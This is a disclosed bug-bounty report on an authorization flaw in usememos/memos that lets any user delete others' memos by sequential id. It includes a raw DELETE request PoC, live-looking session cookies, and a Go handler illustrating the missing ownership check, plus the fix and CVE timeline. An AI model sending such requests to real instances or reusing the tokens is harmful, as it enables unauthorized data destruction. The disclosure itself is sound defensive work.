A user can delete other users' posts in usememos/memos

Valid

Reported on

Dec 26th 2022


Description

As the title says, an attacker can delete other users' posts via the post id (which can be brute-forced).

Here is a video PoC: https://drive.google.com/file/d/18QucWYwkpO9kVPMqNzSQ-ptwrZGk-UP9/view?usp=share_link

Proof of Concept

DELETE /api/memo/1026 HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

The id 1026 is the post ID. When a user creates a post, the id increases by 1, so an attacker can delete other users' posts by sending a DELETE request with this id.

Here is the session id for each account:

Attacker session id: memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW

User demo session id: memos_session=MTY3MjAyMzI4MXxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fP5tDVSp1CxdxPlf5c_7FWcF5Yb5SFR7POch2HJbm_WD

Impact

This vulnerability impacts all users.
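The missing authorization step, shown as an added Go example that is not the memos code base or its 3556ae fix: a minimal DELETE /api/memo/{id} handler over an in-memory store, run once in the reported configuration and once with the ownership check. The Store type, the X-Test-User header standing in for the memos_session cookie, and the checkOwner switch are constructed for this illustration.

```go
package main

import (
	"net/http"
	"strconv"
	"strings"
)

// Store is a constructed stand-in for the memos table (memo id -> creator id). Ids are
// handed out sequentially, which is what makes them guessable in the report.
type Store struct{ next int; owner map[int]int }

func NewStore() *Store { return &Store{next: 1, owner: map[int]int{}} }

// Create stores a memo owned by creatorID and returns its id.
func (s *Store) Create(creatorID int) int {
	id := s.next
	s.next++
	s.owner[id] = creatorID
	return id
}

// Exists reports whether a memo id is still present.
func (s *Store) Exists(id int) bool { _, ok := s.owner[id]; return ok }

// DeleteHandler serves DELETE /api/memo/{id}. checkOwner=false reproduces the reported
// behaviour (any signed-in user may delete any memo); checkOwner=true adds the missing check.
func DeleteHandler(s *Store, checkOwner bool) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		// Hypothetical session lookup: the caller id comes from a constructed X-Test-User
		// header instead of a decoded memos_session cookie.
		uid, err := strconv.Atoi(r.Header.Get("X-Test-User"))
		if err != nil {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		id, err := strconv.Atoi(strings.TrimPrefix(r.URL.Path, "/api/memo/"))
		creator, found := s.owner[id]
		if err != nil || !found {
			http.Error(w, "not found", http.StatusNotFound)
			return
		}
		if checkOwner && creator != uid { // authorization: only the creator may delete
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		delete(s.owner, id)
		w.WriteHeader(http.StatusOK)
	}
}
```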

We are processing your report and will contact the usememos/memos team within 24 hours. (15 days ago)
Nguyen Minh Quang modified the report (15 days ago)
Nguyen Minh Quang modified the report (15 days ago)
We have contacted a member of the usememos/memos team and are waiting to hear back. (14 days ago)
Nguyen Minh Quang modified the report (13 days ago)
STEVEN validated this vulnerability (12 days ago)
Nguyen Minh Quang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit 3556ae (12 days ago)
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability (12 days ago)